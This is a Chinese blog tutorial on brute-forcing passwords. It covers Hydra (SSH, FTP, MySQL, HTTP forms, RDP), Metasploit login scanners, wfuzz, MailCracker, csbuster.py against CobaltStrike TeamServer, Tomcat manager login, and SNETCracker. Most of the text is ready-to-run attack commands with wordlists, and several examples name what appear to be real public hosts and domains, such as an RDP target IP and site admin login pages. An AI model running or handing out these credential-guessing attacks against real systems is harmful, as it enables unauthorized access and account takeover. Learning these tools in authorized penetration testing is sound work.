<p>我们就介绍下，这个装备怎么用；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628352247698-2373a203-cb7a-43d6-97df-ca161d5688f9.png" alt="img"></p>
<p>** 语法：**<strong>Hydra 参数 IP 服务</strong></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br></pre></td><td class="code"><pre><span class="line">常用参数说明</span><br><span class="line">hydra [[[-l LOGIN|-L FILE] [-p PASS|-P FILE]] | [-C FILE]] [-e ns]</span><br><span class="line">[-o FILE] [-t TASKS] [-M FILE [-T TASKS]] [-w TIME] [-f] [-s PORT] [-S] [-vV]</span><br><span class="line">server service [OPT]</span><br><span class="line">-R</span><br><span class="line">	继续从上一次进度接着破解</span><br><span class="line">-S</span><br><span class="line">	大写，采用 SSL 链接</span><br><span class="line">-s &lt;PORT&gt;</span><br><span class="line">	小写，可通过这个参数指定非默认端口</span><br><span class="line">-l &lt;LOGIN&gt;</span><br><span class="line">	指定破解的用户，对特定用户破解</span><br><span class="line">-L &lt;FILE&gt;</span><br><span class="line">	指定用户名字典</span><br><span class="line">-p &lt;PASS&gt;</span><br><span class="line">	小写，指定密码破解，少用，一般是采用密码字典</span><br><span class="line">-P &lt;FILE&gt;</span><br><span class="line">	大写，指定密码字典</span><br><span class="line">-e &lt;ns&gt;</span><br><span class="line">	可选选项，n：空密码试探，s：使用指定用户和密码试探</span><br><span class="line">-C &lt;FILE&gt;</span><br><span class="line">	使用冒号分割格式，例如“登录名:密码”来代替-L/-P 参数</span><br><span class="line">-M &lt;FILE&gt;</span><br><span class="line">	指定目标列表文件一行一条</span><br><span class="line">-o &lt;FILE&gt;</span><br><span class="line">	指定结果输出文件</span><br><span class="line">-f</span><br><span class="line">	在使用-M 参数以后，找到第一对登录名或者密码的时候中止破解</span><br><span class="line">-t &lt;TASKS&gt;</span><br><span class="line">	同时运行的线程数，默认为 16</span><br><span class="line">-w &lt;TIME&gt;</span><br><span class="line">	设置最大超时的时间，单位秒，默认是 30s</span><br><span class="line">-v / -V</span><br><span class="line">	显示详细过程</span><br><span class="line">server</span><br><span class="line">  目标 ip</span><br><span class="line">service</span><br><span class="line">	指定服务名，支持的服务和协议：telnet ftp pop3[-ntlm] imap[-ntlm] smb smbnt</span><br><span class="line">http[s]-&#123;head|get&#125; http-&#123;get|post&#125;-form http-proxy cisco cisco-enable vnc ldap2 ldap3</span><br><span class="line">mssql mysql oracle-listener postgres nntp socks5 rexec rlogin pcnfs snmp rsh cvs svn</span><br><span class="line">icq sapr3 ssh2 smtp-auth[-ntlm] pcanywhere teamspeak sip vmauthd firebird ncp afp</span><br><span class="line">等等</span><br><span class="line">OPT</span><br><span class="line">	可选项</span><br></pre></td></tr></table></figure>
<h3 id="使用-hydra-穷举-ssh-服务"><a class="markdownIt-Anchor" href="#使用-hydra-穷举-ssh-服务">#</a> 使用 hydra 穷举 ssh 服务</h3>
<p>hydra -L users.txt -P password.txt -t 1 -vV -e ns 192.168.1.118 ssh -o ssh.txt -f ssh://192.168.1.118</p>
<p>hydra -l root -P password.txt -t 1 -vV -e ns 192.168.1.118 ssh -o ssh.txt -f</p>
<p>hydra -l root -P 2019_top100.txt 192.168.1.118 ssh -vV -f</p>
<ul>
<li>
<ul>
<li>-L 用户字典文件</li>
<li>-P 密码字典文件</li>
</ul>
</li>
<li>
<ul>
<li>-t 线程数</li>
<li>-vV 详细信息</li>
</ul>
</li>
<li>
<ul>
<li>-e ns 使用空口令 使用指定用户和密码试探</li>
<li>192.168.1.104 你要穷举的 ip</li>
</ul>
</li>
<li>
<ul>
<li>ssh 是服务</li>
<li>-o 保存文件</li>
</ul>
</li>
<li>
<ul>
<li>-f 如果找到马上中断扫描</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628353082803-8b22be12-2a2b-4004-b770-b794a44e16da.png" alt="img"></p>
<h3 id="使用-hydra-穷举-ftp-服务"><a class="markdownIt-Anchor" href="#使用-hydra-穷举-ftp-服务">#</a> 使用 hydra 穷举 ftp 服务</h3>
<p>hydra -L 用户名字典 -P 密码字典 -t6-e ns IP 地址 -v</p>
<p>hydra ip ftp -l 用户名 -P 密码字典 -t 线程 (默认 16) -vV</p>
<p>实例：</p>
<p>hydra 192.168.1.117 ftp -l admin -P top100password.txt -t30 -vV</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628353424811-c8e8a429-eaa1-41c5-9b5c-b7ec74fb3c7f.png" alt="img"></p>
<h3 id="使用-hydra-穷举-mysql-服务"><a class="markdownIt-Anchor" href="#使用-hydra-穷举-mysql-服务">#</a> 使用 hydra 穷举 mysql 服务</h3>
<p>hydra ip mysql -l 用户名 -P 密码字典 -t 线程 (默认 16) -vV</p>
<ul>
<li>
<ul>
<li>hydra 192.168.1.117 mysql -l root -P top100password.txt -t 3 -vV</li>
</ul>
</li>
</ul>
<p>hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV</p>
<ul>
<li>
<ul>
<li>hydra 192.168.1.117 mysql -l root -P top100password.txt -e ns -vV</li>
</ul>
</li>
</ul>
<p>hydra ip mysql -l 用户名 -P 密码字典 -e ns -vV -s 端口</p>
<ul>
<li>
<ul>
<li>hydra 192.168.1.117 mysql -l root -P top100password.txt -e ns -vV -s 3306</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628354111007-5fdee3e4-f3d1-4b60-a619-de1052e7f201.png" alt="img"></p>
<h3 id="使用-hydra-穷举-http-服务"><a class="markdownIt-Anchor" href="#使用-hydra-穷举-http-服务">#</a> 使用 hydra 穷举 http 服务</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br></pre></td><td class="code"><pre><span class="line">get方式提交，破解web登录：</span><br><span class="line">    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns ip http-get /admin/ </span><br><span class="line">    hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get /admin/index.php</span><br><span class="line">//-e ns 支持空密码 </span><br><span class="line">//-f   破解出来一个密码就停止</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">post方式提交，破解web登录：</span><br><span class="line">    hydra -f -l 用户名 -P 密码字典 -V -s 9900 IP地址 http-post-form &quot;/admin/index.php?action=login:user=^USER^&amp;pw=^PASS^&quot;</span><br><span class="line">    hydra -l 用户名 -P 密码字典 -s 80 ip http-post-form &quot;/admin/login.php:username=^USER^&amp;password=^PASS^&amp;submit=login&quot; </span><br><span class="line">// -s 指定非默认端口</span><br><span class="line">// /index.php …这个是登录的 url</span><br><span class="line">// 后门是POST的数据 其中的用户名密码使用 USER PASS 来代替</span><br><span class="line">// 然后是如果登录出错 会出现的字符 。。。然后开始破解</span><br><span class="line"></span><br><span class="line">实例：</span><br><span class="line">    hydra -f -l admin -P /root/pass.txt -V -s 80 www.linghua.com http-post-form &quot;/admin_S/adminlogin.asp:username=^USER^&amp;password=^PASS^&amp;Submit=%B5%C7%C2%BD&amp;action=login:sorry password&quot;  </span><br></pre></td></tr></table></figure>
<h4 id=""><a class="markdownIt-Anchor" href="#">#</a> </h4>
<h3 id="使用-hydra-穷举-rdp-服务"><a class="markdownIt-Anchor" href="#使用-hydra-穷举-rdp-服务">#</a> 使用 hydra 穷举 rdp 服务</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">hydra -l administrator -P pass.txt -V ip rdp</span><br><span class="line"></span><br><span class="line">实例：</span><br><span class="line">  hydra -l chong -P /root/pass.txt -V 60.191.58.185 rdp</span><br></pre></td></tr></table></figure>
<h3 id="kali自带字典目录"><a class="markdownIt-Anchor" href="#kali自带字典目录">#</a> kali 自带字典目录</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/usr/share/wordlists/</span><br></pre></td></tr></table></figure>
<h1 id="metasploit-穷举模块的使用"><a class="markdownIt-Anchor" href="#metasploit-穷举模块的使用">#</a> metasploit 穷举模块的使用</h1>
<p>metasploit 是一个渗透测试集成套件 同样也有穷举模块；</p>
<ul>
<li>
<p>auxiliary/scanner/ftp/ftp_login</p>
</li>
<li>
<p>auxiliary/scanner/ssh/ssh_login</p>
</li>
<li>
<p>auxiliary/scanner/telnet/telnet_login</p>
</li>
<li>
<p>auxiliary/scanner/smb/smb_login</p>
</li>
<li>
<p>auxiliary/scanner/mssql/mssql_login</p>
</li>
<li>
<p>auxiliary/scanner/mysql/mysql_login</p>
</li>
<li>
<p>auxiliary/scanner/oracle/oracle_login</p>
</li>
<li>
<p>auxiliary/scanner/postgres/postgres_login</p>
</li>
<li>
<p>auxiliary/scanner/vnc/vnc_login</p>
</li>
<li>
<p>auxiliary/scanner/pcanywhere/pcanywhere_login</p>
</li>
<li>
<p>auxiliary/scanner/snmp/snmp_login</p>
</li>
</ul>
<p>使用：</p>
<ul>
<li>
<p>首先启动在终端下启动 msfconsole；</p>
</li>
<li>
<p>use 使用 ssh_login 模块：</p>
</li>
<li>
<ul>
<li>use auxiliary/scanner/ssh/ssh_login</li>
</ul>
</li>
<li>
<p>show options 查看模块的参数；</p>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628354519837-7ed9bc6e-685f-498f-9339-6157651c803f.png" alt="img"></p>
<ul>
<li>
<ul>
<li>RHOSTS 攻击的目标</li>
<li>PASS_FILE 密码字典</li>
</ul>
</li>
<li>
<ul>
<li>STOP_ON_SUCCESS 成功破解一个终止</li>
<li>THREADS 线程</li>
</ul>
</li>
<li>
<ul>
<li>USERNAME  用户名</li>
</ul>
</li>
<li>
<p>set 设置参数：</p>
</li>
<li>
<ul>
<li>set RHOSTS 192.168.1.118</li>
<li>set PASS_FILE /home/kali/Desktop/top100password.txt</li>
</ul>
</li>
<li>
<ul>
<li>set STOP_ON_SUCCESS true</li>
<li>set USERNAME root</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628354858798-af09949e-2bd0-4b85-8e32-e9f3e1a48421.png" alt="img"></p>
<ul>
<li>设置好后用 run 或者 exploit  攻击；</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628354936465-26804b50-38b8-4070-82f8-b500d70dcee0.png" alt="img"></p>
<h1 id="御剑-rdp-爆破工具的使用"><a class="markdownIt-Anchor" href="#御剑-rdp-爆破工具的使用">#</a> 御剑 RDP 爆破工具的使用</h1>
<p><span class="exturl" data-url="aHR0cHM6Ly93YXJzZWMueXVxdWUuY29tL2F0dGFjaG1lbnRzL3l1cXVlLzAvMjAyMS96aXAvMjk0MjIyNi8xNjQwNzYxMTQ1NjQ1LTU0ZGFjY2VjLTE0MTEtNDVhZS1iMzBjLTYwYWNjN2Q2NDFkOC56aXA=">📎御剑 RDP 爆破工具.zip</span></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628356259226-facf9feb-1998-41b1-8ae5-0cae84fa054b.png" alt="img"></p>
<h1 id="wfuzz-多线程穷举密码"><a class="markdownIt-Anchor" href="#wfuzz-多线程穷举密码">#</a> wfuzz 多线程穷举密码</h1>
<p>Wfuzz 是一款为了评估 WEB 应用而生的 Fuzz（Fuzz 是爆破的一种手段）工具，它基于一个简单的理念，即用给定的 Payload 去 fuzz。它允许在 HTTP 请求里注入任何输入的值，针对不同的 WEB 应用组件进行多种复杂的爆破攻击。比如：参数、认证、表单、目录 / 文件、头部等等，这款工具在 kali 里面自带；</p>
<p>可以用 Wfuzz 找到下面的漏洞：</p>
<ul>
<li>
<p>可预测的认证</p>
</li>
<li>
<p>可预测的 session 标志（session id）</p>
</li>
<li>
<p>可预测的资源定位（目录和文件）</p>
</li>
<li>
<p>注入</p>
</li>
<li>
<p>路径遍历</p>
</li>
<li>
<p>溢出</p>
</li>
<li>
<p>跨站脚本</p>
</li>
<li>
<p>认证漏洞</p>
</li>
<li>
<p>不安全的直接对象引用</p>
</li>
<li>
<p>………</p>
</li>
</ul>
<h3 id="常用参数"><a class="markdownIt-Anchor" href="#常用参数">#</a> 常用参数：</h3>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">Usage:    wfuzz [options] -z payload,params &lt;url&gt;</span><br><span class="line">    FUZZ, ..., FUZnZ              payload占位符，wfuzz会用指定的payload代替相应的占位符，n代表数字.</span><br><span class="line">    FUZZ&#123;baseline_value&#125;     FUZZ 会被 baseline_value替换，并将此作为测试过程中第一个请求来测试，可用来作为过滤的一个基础。</span><br><span class="line">Options:</span><br><span class="line">    -h/--help            : 帮助文档</span><br><span class="line">    --help                : 高级帮助文档</span><br><span class="line">    --version            : Wfuzz详细版本信息</span><br><span class="line">    -e &lt;type&gt;            :  显示可用的encoders/payloads/iterators/printers/scripts列表</span><br><span class="line">    --recipe &lt;filename&gt;        : 从文件中读取参数</span><br><span class="line">    --dump-recipe &lt;filename&gt;    : 打印当前的参数并保存成文档</span><br><span class="line">    --oF &lt;filename&gt;               : 将测试结果保存到文件，这些结果可被wfuzz payload 处理</span><br><span class="line">    -c                : 彩色化输出</span><br><span class="line">    -v                : 详细输出</span><br><span class="line">    -f filename,printer         : 将结果以printer的方式保存到filename (默认为raw printer).</span><br><span class="line">    -o printer                  : 输出特定printer的输出结果</span><br><span class="line">    --interact            : (测试功能) 如果启用，所有的按键将会被捕获，这使得你能够与程序交互</span><br><span class="line">    --dry-run            : 打印测试结果，而并不发送HTTP请求</span><br><span class="line">    --prev                : 打印之前的HTTP请求（仅当使用payloads来生成测试结果时使用）</span><br><span class="line">    -p addr                : 使用代理，格式 ip:port:type. 可设置多个代理，type可取的值为SOCKS4,SOCKS5 or HTTP（默认）</span><br><span class="line">    -t N                : 指定连接的并发数，默认为10</span><br><span class="line">    -s N                : 指定请求的间隔时间，默认为0</span><br><span class="line">    -R depth            : 递归路径探测，depth指定最大递归数量</span><br><span class="line">    -L,--follow            : 跟随HTTP重定向</span><br><span class="line">    -Z                : 扫描模式 (连接错误将被忽视).</span><br><span class="line">    --req-delay N            : 设置发送请求允许的最大时间，默认为 90，单位为秒.</span><br><span class="line">    --conn-delay N              : 设置连接等待的最大时间，默认为 90，单位为秒.</span><br><span class="line">    -A                : 是 --script=default -v -c 的简写</span><br><span class="line">    --script=            : 与 --script=default 等价</span><br><span class="line">    --script=&lt;plugins&gt;        : 进行脚本扫描， &lt;plugins&gt; 是一个以逗号分开的插件或插件分类列表</span><br><span class="line">    --script-help=&lt;plugins&gt;        : 显示脚本的帮助</span><br><span class="line">    --script-args n1=v1,...     : 给脚本传递参数. ie. --script-args grep.regex=&quot;&lt;A href=\&quot;(.*?)\&quot;&gt;&quot;</span><br><span class="line">    -u url                      : 指定请求的URL</span><br><span class="line">    -m iterator            : 指定一个处理payloads的迭代器 (默认为product)</span><br><span class="line">    -z payload            : 为每一个占位符指定一个payload，格式为 name[,parameter][,encoder].</span><br><span class="line">                      编码可以是一个列表, 如 md5-sha1. 还可以串联起来, 如. md5@sha1.</span><br><span class="line">                      还可使用编码各类名，如 url</span><br><span class="line">                                      使用help作为payload来显示payload的详细帮助信息，还可使用--slice进行过滤</span><br><span class="line">    --zP &lt;params&gt;            : 给指定的payload设置参数。必须跟在 -z 或-w 参数后面</span><br><span class="line">    --slice &lt;filter&gt;        : 以指定的表达式过滤payload的信息，必须跟在-z 参数后面</span><br><span class="line">    -w wordlist            : 指定一个wordlist文件，等同于 -z file,wordlist</span><br><span class="line">    -V alltype            : 暴力测试所有GET/POST参数，无需指定占位符</span><br><span class="line">    -X method            : 指定一个发送请求的HTTP方法，如HEAD或FUZZ</span><br><span class="line">    -b cookie            : 指定请求的cookie参数，可指定多个cookie</span><br><span class="line">    -d postdata             : 设置用于测试的POST data (ex: &quot;id=FUZZ&amp;catalogue=1&quot;)</span><br><span class="line">    -H header              : 设置用于测试请求的HEADER (ex:&quot;Cookie:id=1312321&amp;user=FUZZ&quot;). 可指定多个HEADER.</span><br><span class="line">    --basic/ntlm/digest auth    : 格式为 &quot;user:pass&quot; or &quot;FUZZ:FUZZ&quot; or &quot;domain\FUZ2Z:FUZZ&quot;</span><br><span class="line">    --hc/hl/hw/hh N[,N]+        : 以指定的返回码/行数/字数/字符数作为判断条件隐藏返回结果 (用 BBB 来接收 baseline)</span><br><span class="line">    --sc/sl/sw/sh N[,N]+        : 以指定的返回码/行数/字数/字符数作为判断条件显示返回结果 (用 BBB 来接收 baseline)</span><br><span class="line">    --ss/hs regex            : 显示或隐藏返回结果中符合指定正则表达式的返回结果</span><br><span class="line">    --filter &lt;filter&gt;        : 显示或隐藏符合指定filter表达式的返回结果 (用 BBB 来接收 baseline)</span><br><span class="line">    --prefilter &lt;filter&gt;        : 用指定的filter表达式在测试之前过滤某些测试</span><br></pre></td></tr></table></figure>
<h3 id="使用实例"><a class="markdownIt-Anchor" href="#使用实例">#</a> 使用实例：</h3>
<p>GET 类型爆破：</p>
<ul>
<li>
<ul>
<li>wfuzz -c -z file,users.txt -z file,pass.txt --sc 200 <span class="exturl" data-url="aHR0cDovL3d3dy5zaXRlLmNvbS9sb2cuYXNwP3VzZXI9RlVaWiZhbXA7cGFzcz1GVVoyWg==">http://www.site.com/log.asp?user=FUZZ&amp;pass=FUZ2Z</span></li>
<li>注意，多个参数，就用多个占位符，比如：FUZZ,FUZ2Z,FUZ3Z,FUZnZ；</li>
</ul>
</li>
</ul>
<p>POST 类型爆破：</p>
<ul>
<li>
<ul>
<li>wfuzz -c -z file,2019_top100.txt --sc 302 -u <span class="exturl" data-url="aHR0cDovL3d3dy5jMW1vb24uY29tL2FkbWluL2luZGV4LnBocD9hY3Rpb249bG9naW4=">http://www.c1moon.com/admin/index.php?action=login</span> -d “user=admin&amp;pw=FUZZ”</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628358146427-3f06d96d-7eff-4400-be3c-e6ff6b620ac9.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628358220411-a5f2ad9f-d271-4cac-a985-6afaf4bf253d.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628358236235-24621f50-afd8-46ad-b798-18c4274eaa95.png" alt="img"></p>
<p>另外两种方式：</p>
<ul>
<li>
<ul>
<li>wfuzz -c -z file,top100password.txt --hc 404 --hh 1549 -u <span class="exturl" data-url="aHR0cDovL3d3dy5jMW1vb24uY29tL2FkbWluL2luZGV4LnBocD9hY3Rpb249bG9naW4=">http://www.c1moon.com/admin/index.php?action=login</span> -d “user=admin&amp;pw=FUZZ”</li>
</ul>
</li>
<li>
<ul>
<li>
<ul>
<li>排除，我们都知道，登陆成功的话很多网站都会是 302 跳转，那我们可以通过–hc 参数排除 404 的状态码，–hh 排除 1549 的长度包；</li>
</ul>
</li>
</ul>
</li>
<li>
<ul>
<li>wfuzz -c -w /home/kali/csdnpass.txt --hc 404 --hh 1549 -u <span class="exturl" data-url="aHR0cDovL3d3dy5jMW1vb24uY29tL2FkbWluL2luZGV4LnBocD9hY3Rpb249bG9naW4=">http://www.c1moon.com/admin/index.php?action=login</span> -d “user=admin&amp;pw=FUZZ”</li>
</ul>
</li>
<li>
<ul>
<li>
<ul>
<li>同上排除，只不过是加载密码文件方式不一样了，直接使用 - w 参数加载密码文件；</li>
</ul>
</li>
</ul>
</li>
</ul>
<h1 id="邮箱密码的穷举"><a class="markdownIt-Anchor" href="#邮箱密码的穷举">#</a> 邮箱密码的穷举</h1>
<p>以 qq 邮箱为例：</p>
<ul>
<li>
<ul>
<li>POP3/SMTP 协议：<br>
收发邮件服务器地址分别如下：<br>
接收邮件服务器：<span class="exturl" data-url="aHR0cDovL3BvcC5leG1haWwucXEuY29t">pop.exmail.qq.com</span> (端口 110)<br>
 发送邮件服务器：<span class="exturl" data-url="aHR0cDovL3NtdHAuZXhtYWlsLnFxLmNvbQ==">smtp.exmail.qq.com</span> (端口 25)<br>
 同时支持 SSL 加密方式登录，此时需要更改一下端口号：<br>
接收服务器端口：995<br>
 发送服务器端口：465</li>
</ul>
</li>
</ul>
<h2 id="企业独立搭建的邮服-用-mailcracker-进行破解"><a class="markdownIt-Anchor" href="#企业独立搭建的邮服-用-mailcracker-进行破解">#</a> 企业独立搭建的邮服 用 MailCracker 进行破解</h2>
<p><span class="exturl" data-url="aHR0cHM6Ly93YXJzZWMueXVxdWUuY29tL2F0dGFjaG1lbnRzL3l1cXVlLzAvMjAyMS9yYXIvMjk0MjIyNi8xNjQwNzYxMTQ1ODMxLTFiNDgwMWUyLTNmMjktNDUyNy04MGFlLTk1NWIzNDdjZGVhYS5yYXI=">📎MailCracker_Trial_CN.rar</span></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628359979627-4e968d80-6668-4db0-94e6-9d98246f6eef.png" alt="img"></p>
<p>爆破出来可以使用 foxmail 这个工具进行连接；</p>
<p>地址：<span class="exturl" data-url="aHR0cHM6Ly93d3cuZm94bWFpbC5jb20v">https://www.foxmail.com/</span></p>
<h1 id="cobaltstrike-teamserver-口令暴力破解"><a class="markdownIt-Anchor" href="#cobaltstrike-teamserver-口令暴力破解">#</a> CobaltStrike TeamServer 口令暴力破解</h1>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628360367338-b43d6c51-0f46-460f-8da4-146c419b08f3.png" alt="img"></p>
<p>Cobalt Strike 是一款超级好用的渗透测试工具，拥有多种协议主机上线方式，集 成了提权，凭据导出，端口转发，socket 代理，office 攻击，文件捆绑，钓鱼等 多种功能。同时，Cobalt Strike 还可以调用 Mimikatz 等其他知名工具，因此广受 技术大佬的喜爱。Cobalt Strike 是一款超级好用的渗透测试工具，拥有多种协议 主机上线方式，集成了提权，凭据导出，端口转发，socket 代理，office 攻击， 文件捆绑，钓鱼等多种功能。同时，Cobalt Strike 还可以调用 Mimikatz 等其他知 名工具，因此广受技术大佬的喜爱；</p>
<p>Cobalt Strike 是由美国 Red Team 开发；</p>
<p>官网地址： <span class="exturl" data-url="aHR0cDovL2NvYmFsdHN0cmlrZS5jb20=">http://cobaltstrike.com</span></p>
<p>这个工具的社区版是大家熟知的 Armitage (一个 MSF 的图形化界面工具)，而 Cobalt Strike 大家可以理解其为 Armitage 的商业版；</p>
<p>TeamServer 口令暴力破解 然而今天我们并不是介绍和讲解 Cobalt Strike，而是关于 Cobalt Strike 的口令暴 力破解，众所周知 Cobalt Strike 的工作方式是以 TeamServer 为核心，可多个 Cilent 的 CS（Server Cilent）架构；</p>
<p>启动 teamserver</p>
<p>sudo ./teamserver 192.168.0.102 123456</p>
<p>启动 temaerver 之后可以通过客户端连接连接服务器 默认的端口是 50050 密码 是 123456 即可登录；</p>
<p>如果把 teamserver 放在公网上，口令设置薄弱 可以通过对其穷举有一定的几率 获取 teamserver 的权限，那么服务器里的被成功控制的机器，我们也可以对其 控制。所以说危害是非常大的；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361085248-d92a5b1e-6f90-49fd-b7eb-10ece8f62d0a.png" alt="img"></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361093516-de9028b6-3285-478d-ad91-fa5286305fd7.png" alt="img"></p>
<p>使用 <span class="exturl" data-url="aHR0cDovL2NzYnVzdGVyLnB5">csbuster.py</span> 对 50050 端口进行密码穷举：</p>
<p>工具：<span class="exturl" data-url="aHR0cHM6Ly93YXJzZWMueXVxdWUuY29tL2F0dGFjaG1lbnRzL3l1cXVlLzAvMjAyMS9weS8yOTQyMjI2LzE2NDA3NjExNDU5OTktODkyYWQyNWYtOTViZS00Y2MyLTlhMGQtMzUyYmM0NGNiMzM3LnB5">📎csbuster.py</span></p>
<p>使用方法：python3 <span class="exturl" data-url="aHR0cDovL2NzYnVzdGVyLnB5">csbuster.py</span> 192.168.0.102 /home/kali/top1000.txt -t 5</p>
<ul>
<li>
<ul>
<li>
<ul>
<li>-p   指定端口，默认 50050</li>
</ul>
</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361214646-9bb3e0cf-a2c0-4814-9c88-3efcafa03859.png" alt="img"></p>
<h1 id="对-apache-tomcat-服务进行穷举"><a class="markdownIt-Anchor" href="#对-apache-tomcat-服务进行穷举">#</a> 对 apache-tomcat  服务进行穷举</h1>
<p>Apache Tomcat 是世界上使用最广泛的 Java Web 应用服务器之一，绝大数人都会 使用 Tomcat 的默认配置。然而默认配置中会有一个向外网开放的 Web 应用管理 器，管理员可以利用它在服务器中启动、停止、添加和删除应用；</p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361324716-f3d4a86e-9575-4c6f-8d53-5d6d6ed42f0a.png" alt="img"></p>
<p>msf 利用：</p>
<ul>
<li>
<ul>
<li>use scanner/http/tomcat_mgr_login</li>
<li>set PASSWORD    设置密码字典</li>
</ul>
</li>
<li>
<ul>
<li>set RPORT 8081     设置端口</li>
<li>set RHOSTS 192.168.52.6</li>
</ul>
</li>
<li>
<ul>
<li>exploit     攻击</li>
</ul>
</li>
</ul>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361399728-2ab1e1ee-bef1-43b6-8011-4bdcc1a4a692.png" alt="img"></p>
<h1 id="超级弱口令穷举使用"><a class="markdownIt-Anchor" href="#超级弱口令穷举使用">#</a> 超级弱口令穷举使用</h1>
<p>地址：<span class="exturl" data-url="aHR0cHM6Ly9naXRodWIuY29tL3NoYWNrMi9TTkVUQ3JhY2tlcg==">https://github.com/shack2/SNETCracker</span></p>
<p><img data-src="https://cdn.nlark.com/yuque/0/2021/png/2336202/1628361992414-3d1fb30e-832b-452f-ba11-1cacf582778c.png" alt="img"></p>
<p>若有收获，就点个赞吧</p>

  </div>

   <footer>

    <div class="meta">
  <span class="item">
    <span class="icon">
      <i class="ic i-calendar-check"></i>
    </span>
    <span class="text">更新于</span>
    <time title="修改时间：2022-03-02 11:01:51" itemprop="dateModified" datetime="2022-03-02T11:01:51+08:00">2022-03-02</time>
  </span>
</div>

      
<div class="reward">
  <button><i class="ic i-heartbeat"></i> 赞赏</button>
  <p>请我喝[茶]~(￣▽￣)~*</p>
  <div id="qr">
      
      <div>
        <img data-src="/images/wechatpay.png" alt="John Doe 微信支付">
        <p>微信支付</p>
      </div>
      
      <div>
        <img data-src="/images/alipay.png" alt="John Doe 支付宝">
        <p>支付宝</p>
      </div>
      
      <div>
        <img data-src="/images/paypal.png" alt="John Doe 贝宝">
        <p>贝宝</p>
      </div>
  </div>
</div>

      

<div id="copyright">
<ul>
  <li class="author">
    <strong>本文作者： </strong>John Doe <i class="ic i-at"><em>@</em></i>Hexo
  </li>
  <li class="link">
    <strong>本文链接：</strong>
